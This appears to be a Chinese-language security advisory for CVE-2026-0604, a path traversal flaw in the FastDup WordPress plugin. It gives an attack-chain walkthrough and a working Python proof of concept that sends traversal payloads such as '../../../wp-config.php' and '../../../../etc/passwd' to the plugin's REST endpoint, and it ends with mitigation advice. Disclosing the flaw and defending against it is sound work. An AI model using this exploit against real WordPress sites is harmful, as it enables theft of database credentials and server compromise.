CVE-2026-0604 FastDup WordPress插件路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-0604

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FastDup WordPress Migration & Duplicator plugin

漏洞概述

CVE-2026-0604是WordPress FastDup插件中的一个路径遍历（Path Traversal）漏洞。该插件是WordPress最快速的网站迁移和克隆工具，在所有2.7及之前版本中均受影响。漏洞存在于插件注册的REST API端点'njt-fastdup/v1/template/directory-tree'中，特别是'dir_path'参数缺乏充分的输入验证。攻击者通过构造特殊的目录遍历序列（如../），可以突破应用程序的目录限制，访问服务器上任意目录的内容。此漏洞需要认证才能利用，但只需要Contributor级别的最低权限即可触发。成功利用此漏洞可能导致敏感配置文件、数据库凭证、其他插件代码以及用户隐私数据等机密信息泄露。由于WordPress插件常被用于完整的网站迁移和数据备份，攻击者获取的敏感信息可能被进一步利用，造成更严重的安全后果。

技术细节

漏洞根源在于FastDup插件的TemplateApi.php文件中，当处理'dir_path'参数时未对用户输入进行安全过滤。攻击者可通过REST API向'njt-fastdup/v1/template/directory-tree'端点发送POST请求，在'dir_path'参数中注入路径遍历序列。典型的攻击payload如'../../../wp-config.php'或'../../../../etc/passwd'，利用相对路径跳转读取服务器上的敏感文件。插件代码直接使用用户提供的路径参数进行文件操作，而没有验证路径是否在允许的目录范围内。这种不安全的目录遍历允许攻击者枚举服务器文件系统，访问WordPress配置文件（包含数据库凭证）、其他插件和主题文件、wp-content目录下的上传文件等。CVSS 3.1评分6.5主要反映了高机密性影响（C:H），攻击复杂度低（AC:L），但需要低权限认证（PR:L）且无需用户交互（UI:N）。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标WordPress网站并确认安装了FastDup插件版本<=2.7

STEP 2

Authentication

攻击者获取WordPress Contributor级别账户（通过社会工程、凭证填充或利用其他漏洞）

STEP 3

Nonce获取

攻击者从网站页面源码中提取REST API所需的X-WP-Nonce值

STEP 4

构造恶意请求

攻击者构造包含路径遍历payload的POST请求，目标端点为/njt-fastdup/v1/template/directory-tree，dir_path参数包含如../../../wp-config.php的遍历序列

STEP 5

敏感文件读取

服务器执行目录遍历操作，返回目标文件/目录内容，攻击者获得数据库凭证、API密钥等敏感信息

STEP 6

权限提升

利用获取的凭证进行进一步攻击，可能包括完全控制WordPress网站或服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-0604 PoC - FastDup Path Traversal
# Authenticated attackers with Contributor+ access can read arbitrary directories

TARGET_URL = "http://target-wordpress-site.com"
API_ENDPOINT = "/wp-json/njt-fastdup/v1/template/directory-tree"

# Authentication cookies (Contributor level or higher)
COOKIES = {
    "wordpress_logged_in_": "your-auth-cookie-here"
}

def read_directory(dir_path):
    """Read arbitrary directory contents via path traversal"""
    url = f"{TARGET_URL}{API_ENDPOINT}"
    
    headers = {
        "Content-Type": "application/json",
        "X-WP-Nonce": "your-wp-nonce-here"
    }
    
    # Payload: Path traversal to read wp-config.php
    payload = {
        "dir_path": dir_path
    }
    
    try:
        response = requests.post(url, json=payload, cookies=COOKIES, headers=headers, timeout=10)
        if response.status_code == 200:
            return response.json()
        else:
            return {"error": f"HTTP {response.status_code}"}
    except requests.RequestException as e:
        return {"error": str(e)}

if __name__ == "__main__":
    # Example: Read WordPress config file
    target_path = "../../../wp-config.php"
    print(f"[*] Attempting to read: {target_path}")
    result = read_directory(target_path)
    print(f"[+] Result: {result}")
    
    # Example: Read /etc/passwd
    target_path = "../../../../etc/passwd"
    print(f"[*] Attempting to read: {target_path}")
    result = read_directory(target_path)
    print(f"[+] Result: {result}")

影响范围

FastDup WordPress plugin <= 2.7

防御指南

临时缓解措施

立即将FastDup插件升级到2.8或更高版本。在等待更新期间，可通过WordPress安全插件限制Contributor角色的REST API访问，或暂时禁用FastDup插件。同时应检查WordPress用户账户，移除不必要的Contributor级别账户，并审查最近的管理员活动日志以检测潜在的利用迹象。